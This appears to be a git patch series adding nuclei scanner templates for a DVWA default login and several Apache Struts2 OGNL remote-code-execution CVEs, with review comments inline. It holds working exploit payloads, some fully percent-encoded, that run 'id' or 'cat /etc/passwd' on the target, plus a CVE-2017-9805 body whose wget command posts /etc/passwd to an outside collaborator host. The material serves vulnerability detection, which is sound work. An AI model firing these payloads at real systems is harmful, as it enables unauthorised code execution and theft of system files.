From b7d781015ca0acddb2f2a08507c19f8d4159592a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Sat, 20 Feb 2021 14:21:54 +0530 Subject: [PATCH 001/370] Adding dvwa default login --- default-logins/dvwa/dvwa-default-login.yaml | 44 +++++++++++++++++++++ 1 file changed, 44 insertions(+) create mode 100644 default-logins/dvwa/dvwa-default-login.yaml diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml new file mode 100644 index 0000000000..4e6c82a9c9 --- /dev/null +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -0,0 +1,44 @@ +id: dvwa-default-login +info: + name: DVWA Default Login + author: pdteam + severity: critical + +requests: + - raw: + - | + GET /login.php HTTP/1.1 + Host: {{Hostname}} + Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 + Connection: close + + - | + POST /login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: PHPSESSID={{session}}; security=low + Connection: close + + username=admin&password=password&Login=Login&user_token={{token}} + + extractors: + - type: regex + name: token + group: 1 + internal: true + part: body + regex: + - "hidden' name='user_token' value='([0-9a-z]+)'" + + - type: kval + name: session + internal: true + part: body + kval: + - PHPSESSID + + redirects: true + matchers: + - type: word + words: + - "You have logged in as 'admin'" From 1308df85eaf7d4ca7c15e10edbfcc8226461de5e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 20 Feb 2021 08:52:33 +0000 Subject: [PATCH 002/370] Auto Update README [Sat Feb 20 08:52:33 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 22ae188369..16923bd888 100644 --- a/README.md +++ b/README.md 
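Review bot: The `info` block of dvwa-default-login.yaml has no `tags:` entry, unlike every other template created in this series, so the check cannot be selected or excluded by tag; a line such as `tags: dvwa,default-login` (constructed example) in `info` would fix that. The `session` extractor is `type: kval` with `part: body`, but as far as I know kval reads key/value pairs from response headers and cookies, so the `part: body` line is either ignored or misleading; drop it, or comment that `PHPSESSID` comes from the `Set-Cookie` header. The `security=low` cookie in the POST is not needed for the login itself and deserves a one-line comment stating why it is set.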
@@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 198 | vulnerabilities | 91 | exposed-panels | 74 | | exposures | 47 | technologies | 46 | misconfiguration | 43 | -| workflows | 21 | miscellaneous | 12 | default-logins | 10 | +| workflows | 21 | miscellaneous | 12 | default-logins | 11 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 573 files**. +**62 directories, 574 files**. From d7ab8a24440e7cdd953fd40044cc0ddae1b288f4 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:57:34 +0000 Subject: [PATCH 003/370] add CVE-2007-4556 --- cves/2007/CVE-2007-4556.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2007/CVE-2007-4556.yaml diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml new file mode 100644 index 0000000000..effef1fcdb --- /dev/null +++ b/cves/2007/CVE-2007-4556.yaml @@ -0,0 +1,29 @@ +id: CVE-2007-4556 + +info: + name: Apache Struts2 S2-001 RCE + author: pikpikcu + severity: critical + reference: https://www.guildhab.top/?p=2326 + tags: cve, cve2007,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/login.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + username=test&password=%25%7B123456789*987654321%7D + + matchers-condition: and + matchers: + + - type: word + words: + - "-67153019" + condition: and + + - type: status + status: + - 200 From b25bf4448ee6de296f25f4c1fe6139ee2e5a0d81 Mon Sep 17 00:00:00 2001 
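Review bot: `body: |` in cves/2007/CVE-2007-4556.yaml keeps the block scalar's trailing newline, so the form body is sent as `username=...%7D` followed by a line break; `body: |-` strips it and sends exactly the urlencoded string the template shows. The same `|` header is used for the POST bodies of CVE-2012-0838, CVE-2017-9791 and CVE-2013-1965 later in this series. `condition: and` under a single-entry `words:` list is a no-op, here and in most of the other new templates, and reads as if a second token were expected; either drop it or add the second value it implies.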
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:59:05 +0000 Subject: [PATCH 004/370] Create CVE-2012-0838.yaml --- cves/2012/CVE-2012-0838.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 cves/2012/CVE-2012-0838.yaml diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml new file mode 100644 index 0000000000..dd5331204f --- /dev/null +++ b/cves/2012/CVE-2012-0838.yaml @@ -0,0 +1,29 @@ +id: CVE-2012-0838 + +info: + name: Apache Struts2 S2-007 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113849942 + tags: cve, cve2012,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/user.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 + + matchers-condition: and + matchers: + + - type: regex + regex: + - "uid=*" + condition: and + + - type: status + status: + - 200 From cdaef9c5256d7f6d91e22456bf631cca1cd84f52 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 13:59:42 +0000 Subject: [PATCH 005/370] Create CVE-2012-0392.yaml --- cves/2012/CVE-2012-0392.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2012/CVE-2012-0392.yaml diff --git a/cves/2012/CVE-2012-0392.yaml b/cves/2012/CVE-2012-0392.yaml new file mode 100644 index 0000000000..d89fe41d73 --- /dev/null +++ b/cves/2012/CVE-2012-0392.yaml 
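Review bot: The regex `"uid=*"` in cves/2012/CVE-2012-0838.yaml does not require `uid=` at all: the `*` quantifies the `=`, so the pattern matches any body containing the substring `uid` (`guid`, `uuid`, `fluid`), and combined with the 200-status matcher it will fire on ordinary pages. The follow-up in b6091f90 (`uid(.*)` / `gid(.*)` with `condition: and`) has the same weakness, and cves/2013/CVE-2013-2135.yaml is created with the identical `"uid=*"` pattern before 837d43a4 replaces it; the anchored form introduced there, `((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)`, is what all three templates should share. The `reference:` is a third-party blog post rather than the vendor advisory or NVD entry that the CVE-2017-9805 and CVE-2017-12611 templates in this series cite.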
@@ -0,0 +1,25 @@ +id: CVE-2012-0392 + +info: + name: Apache Struts2 S2-008 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113850545 + tags: cve, cve2012,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From fc14c602b6e02f9472a2ab1d612908d591a36ae5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:01:07 +0000 Subject: [PATCH 006/370] Create CVE-2017-9805.yaml --- cves/2017/CVE-2017-9805.yaml | 37 ++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 cves/2017/CVE-2017-9805.yaml diff --git a/cves/2017/CVE-2017-9805.yaml b/cves/2017/CVE-2017-9805.yaml new file mode 100644 index 0000000000..a264ac651a --- /dev/null +++ b/cves/2017/CVE-2017-9805.yaml 
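Review bot: cves/2012/CVE-2012-0392.yaml confirms OGNL evaluation by running `cat /etc/passwd` on the target and matching `root:[x*]:0:0`, which spawns a process on every host scanned and copies the file's contents into scanner output. CVE-2007-4556 in this same series shows the side-effect-free alternative, an arithmetic expression (`%{123456789*987654321}`) matched against its result `-67153019`; a detection-only template can use the same approach. The same executing payload appears in CVE-2017-12611, CVE-2013-1966, CVE-2013-2134, CVE-2017-9791 and CVE-2013-1965. Separately, `tags: cve, cve2012,apache,rce` keeps a space after the first comma that the rest of the series uses the comma-only form for.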
@@ -0,0 +1,37 @@ +id: CVE-2017-9805 + +info: + name: Apache Struts2 S2-052 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9805 + tags: cve, cve2017,apache,rce + +# ref: https://medium.com/@blackriddle/apache-struts2-rce-cve-2017-9805-4c6f58b622cb + +requests: + - method: POST + path: + - "{{BaseURL}}/struts2-rest-showcase/orders/3" + - "{{BaseURL}}/orders" + headers: + Content-Type: application/xml + body: | + + + 0 false 0 wget --post-file /etc/passwd burpcollaborator.net false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 + + + + matchers-condition: and + matchers: + + - type: word + words: + - "Debugging information" + - "com.thoughtworks.xstream.converters.collections.MapConverter" + condition: and + + - type: status + status: + - 500 From 3e111595bfb2867aacb6966884b9bb60e3a3ce27 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:01:50 +0000 Subject: [PATCH 007/370] Create CVE-2017-12611.yaml --- cves/2017/CVE-2017-12611.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2017/CVE-2017-12611.yaml diff --git a/cves/2017/CVE-2017-12611.yaml b/cves/2017/CVE-2017-12611.yaml new file mode 100644 index 0000000000..7ead98e310 --- /dev/null +++ b/cves/2017/CVE-2017-12611.yaml 
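Review bot: The (tag-stripped) XML body in cves/2017/CVE-2017-9805.yaml embeds `wget --post-file /etc/passwd burpcollaborator.net`, which on a vulnerable host uploads the password file to a hard-coded third-party domain, yet the matchers only look for the XStream `Debugging information` / `MapConverter` text and a 500, which the conversion error produces regardless of what the command does. Substitute a command with no effect on the target so the check neither exfiltrates target data nor depends on outbound egress; the rewritten body in dae21b45 later in this series keeps the same wget command. The `# ref:` comment sits between `info` and `requests` instead of being an `info.reference` entry; 1707534f later deletes it, so the medium link is lost rather than moved.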
@@ -0,0 +1,25 @@ +id: CVE-2017-12611 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-12611 + tags: cve, cve2017,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From d3ee89f5928f2021124f8ec59a5c7e8e1577a6a1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:23:04 +0000 Subject: [PATCH 008/370] Create CVE-2013-1966.yaml --- cves/2013/CVE-2013-1966.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2013/CVE-2013-1966.yaml diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml new file mode 100644 index 0000000000..caff849b45 --- /dev/null +++ b/cves/2013/CVE-2013-1966.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2013-1966 + +info: + name: Apache Struts2 S2-013 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113636581?utm_medium=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-OPENSEARCH-1.control + tags: cve, cve2013,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html;charset=UTF-8" + part: header + + - type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 
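Review bot: The header matcher `"Content-Type: text/html;charset=UTF-8"` in cves/2013/CVE-2013-1966.yaml is an exact substring match and misses servers that emit `text/html; charset=UTF-8` or another charset, while the sibling CVE-2013-2134 template matches only `Content-Type: text/html`; align on the shorter form, since the charset adds nothing to confirming the finding. The `reference:` URL carries `utm_medium`, `dist_request_id` and `depth_1-utm_source` tracking parameters (also in CVE-2013-2134); trim it to the article path. The query string percent-encodes every character including letters (`%24%7b%23%5f%6d%65...`), which makes the template unauditable at review time; CVE-2013-1965 later in this series encodes only reserved characters, and the same obfuscated encoding is used in CVE-2013-2134 and CVE-2017-9791.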
From 5273e20ebe7e325c5527b4de0dce598804f58906 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 14:54:26 +0000 Subject: [PATCH 009/370] Create CVE-2013-2134.yaml --- cves/2013/CVE-2013-2134.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2013/CVE-2013-2134.yaml diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml new file mode 100644 index 0000000000..124ab83ec5 --- /dev/null +++ b/cves/2013/CVE-2013-2134.yaml 
@@ -0,0 +1,32 @@ +id: CVE-2013-2134 + +info: + name: Apache Struts2 S2-015 RCE + author: pikpikcu + severity: critical + reference: https://blog.csdn.net/weixin_43416469/article/details/113852197?utm_medium=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control&dist_request_id=979f56d5-0937-4e8d-8e1e-79f3a5d24e14&depth_1-utm_source=distribute.pc_relevant.none-task-blog-OPENSEARCH-11.control + tags: cve, cve2013,apache,rce + +requests: + - method: GET + path: + - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" + headers: + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html" + part: header + + - type: regex + regex: + - 
"root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 2b8572d15e8ccb4acc3229e943dbf9bf5fbf6bc0 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 21 Feb 2021 15:39:29 +0000 Subject: [PATCH 010/370] Create CVE-2017-9791.yaml --- cves/2017/CVE-2017-9791.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2017/CVE-2017-9791.yaml diff --git a/cves/2017/CVE-2017-9791.yaml b/cves/2017/CVE-2017-9791.yaml new file mode 100644 index 0000000000..d627ab66e8 --- /dev/null +++ b/cves/2017/CVE-2017-9791.yaml 
@@ -0,0 +1,33 @@ +id: CVE-2017-9791 + +info: + name: Apache Struts2 S2-053 RCE + author: pikpikcu + severity: critical + reference: https://nvd.nist.gov/vuln/detail/CVE-2017-9791 + tags: cve, cve2017,apache,rce + +requests: + - method: POST + path: + - "{{BaseURL}}/integration/saveGangster.action" + headers: + Content-Type: application/x-www-form-urlencoded + body: | + name=%25%7b%28%23%64%6d%3d%40%6f%67%6e%6c%2e%4f%67%6e%6c%43%6f%6e%74%65%78%74%40%44%45%46%41%55%4c%54%5f%4d%45%4d%42%45%52%5f%41%43%43%45%53%53%29%2e%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3f%28%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%3d%23%64%6d%29%3a%28%28%23%63%6f%6e%74%61%69%6e%65%72%3d%23%63%6f%6e%74%65%78%74%5b%27%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%2e%63%6f%6e%74%61%69%6e%65%72%27%5d%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%3d%23%63%6f%6e%74%61%69%6e%65%72%2e%67%65%74%49%6e%73%74%61%6e%63%65%28%40%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%6f%67%6e%6c%2e%4f%67%6e%6c%55%74%69%6c%40%63%6c%61%73%73%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%50%61%63%6b%61%67%65%4e%61%6d%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%6f%67%6e%6c%55%74%69%6c%2e%67%65%74%45%78%63%6c%75%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description= + + matchers-condition: and + matchers: + - type: word + words: + - "Content-Type: text/html" + part: header + + - 
type: regex + regex: + - "root:[x*]:0:0" + condition: and + + - type: status + status: + - 200 From 1707534f0119d7cec01b8313d7c3e13729349818 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Mon, 22 Feb 2021 01:48:07 +0530 Subject: [PATCH 011/370] misc fixes --- cves/2007/CVE-2007-4556.yaml | 2 +- cves/2012/CVE-2012-0838.yaml | 2 +- cves/2013/CVE-2013-1966.yaml | 4 ++-- cves/2013/CVE-2013-2134.yaml | 4 ++-- cves/2017/CVE-2017-9805.yaml | 12 +++++------- 5 files changed, 11 insertions(+), 13 deletions(-) diff --git a/cves/2007/CVE-2007-4556.yaml b/cves/2007/CVE-2007-4556.yaml index effef1fcdb..9fdb8d6165 100644 --- a/cves/2007/CVE-2007-4556.yaml +++ b/cves/2007/CVE-2007-4556.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/login.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | username=test&password=%25%7B123456789*987654321%7D diff --git a/cves/2012/CVE-2012-0838.yaml b/cves/2012/CVE-2012-0838.yaml index dd5331204f..15c550993f 100644 --- a/cves/2012/CVE-2012-0838.yaml +++ b/cves/2012/CVE-2012-0838.yaml @@ -12,7 +12,7 @@ requests: path: - "{{BaseURL}}/user.action" headers: - Content-Type: application/x-www-form-urlencoded + Content-Type: application/x-www-form-urlencoded body: | name=tes&email=tes&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27id%27%29.getInputStream%28%29%29%29+%2B+%27 diff --git a/cves/2013/CVE-2013-1966.yaml b/cves/2013/CVE-2013-1966.yaml index caff849b45..95e8844d27 100644 --- a/cves/2013/CVE-2013-1966.yaml +++ b/cves/2013/CVE-2013-1966.yaml 
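Review bot: `name: Apache Struts2 S2-053 RCE` in cves/2017/CVE-2017-9791.yaml is copied from the CVE-2017-12611 template created in this series; CVE-2017-9791 is the Struts 1 plugin bulletin (showcase `/integration/saveGangster.action`), not S2-053, so reports built from `info.name` will misidentify the finding. Correct the `name:` to the advisory CVE-2017-9791 actually maps to, and consider adding a `description:` as the CVE-2013-2251 and CVE-2017-5638 templates already have. `body: |` also leaves a trailing newline after `description=`, harmless here but not the form body the template appears to intend.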
@@ -12,8 +12,8 @@ requests: path: - "{{BaseURL}}/link.action?a=%24%7b%23%5f%6d%65%6d%62%65%72%41%63%63%65%73%73%5b%22%61%6c%6c%6f%77%53%74%61%74%69%63%4d%65%74%68%6f%64%41%63%63%65%73%73%22%5d%3d%74%72%75%65%2c%23%61%3d%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%62%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%61%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%63%2e%72%65%61%64%28%23%64%29%2c%23%6f%75%74%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%73%74%72%75%74%73%32%2e%53%65%72%76%6c%65%74%41%63%74%69%6f%6e%43%6f%6e%74%65%78%74%40%67%65%74%52%65%73%70%6f%6e%73%65%28%29%2e%67%65%74%57%72%69%74%65%72%28%29%2c%23%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%27%64%62%61%70%70%3d%27%2b%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%64%29%29%2c%23%6f%75%74%2e%63%6c%6f%73%65%28%29%7d" headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 + Accept-Language: id,en-US;q=0.7,en;q=0.3 matchers-condition: and matchers: diff --git a/cves/2013/CVE-2013-2134.yaml b/cves/2013/CVE-2013-2134.yaml index 124ab83ec5..c58fa2a8de 100644 --- a/cves/2013/CVE-2013-2134.yaml +++ b/cves/2013/CVE-2013-2134.yaml 
@@ -12,8 +12,8 @@ requests: path: - "{{BaseURL}}/param.action?message=%25%7b%23%61%3d%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%50%72%6f%63%65%73%73%42%75%69%6c%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%5b%5d%7b%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%7d%29%29%2e%72%65%64%69%72%65%63%74%45%72%72%6f%72%53%74%72%65%61%6d%28%74%72%75%65%29%2e%73%74%61%72%74%28%29%2c%23%62%3d%23%61%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%2c%23%63%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%23%62%29%2c%23%64%3d%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%23%63%29%2c%23%65%3d%6e%65%77%20%63%68%61%72%5b%35%30%30%30%30%5d%2c%23%64%2e%72%65%61%64%28%23%65%29%2c%23%66%3d%23%63%6f%6e%74%65%78%74%2e%67%65%74%28%22%63%6f%6d%2e%6f%70%65%6e%73%79%6d%70%68%6f%6e%79%2e%78%77%6f%72%6b%32%2e%64%69%73%70%61%74%63%68%65%72%2e%48%74%74%70%53%65%72%76%6c%65%74%52%65%73%70%6f%6e%73%65%22%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%70%72%69%6e%74%6c%6e%28%6e%65%77%20%6a%61%76%61%2e%6c%61%6e%67%2e%53%74%72%69%6e%67%28%23%65%29%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%66%6c%75%73%68%28%29%2c%23%66%2e%67%65%74%57%72%69%74%65%72%28%29%2e%63%6c%6f%73%65%28%29%7d" headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: id,en-US;q=0.7,en;q=0.3 + Accept: 